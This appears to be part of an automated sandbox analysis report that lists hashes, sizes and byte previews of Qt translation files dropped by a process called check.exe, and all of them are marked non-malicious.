                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                            MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                            SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                            SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                            SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293121
                                                                                                                                                                                                            Entropy (8bit):5.272179385890926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                            MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                            SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                            SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                            SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                            Entropy (8bit):3.739162292019161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                            MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                            SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                            SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                            SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.680458675741643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                            MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                            SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                            SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                            SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.463523104731333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                            MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                            SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                            SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                            SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):323590
                                                                                                                                                                                                            Entropy (8bit):4.568068046062524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                            MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                            SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                            SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                            SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                                                            Entropy (8bit):3.880645689209568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                            MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                            SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                            SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                            SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
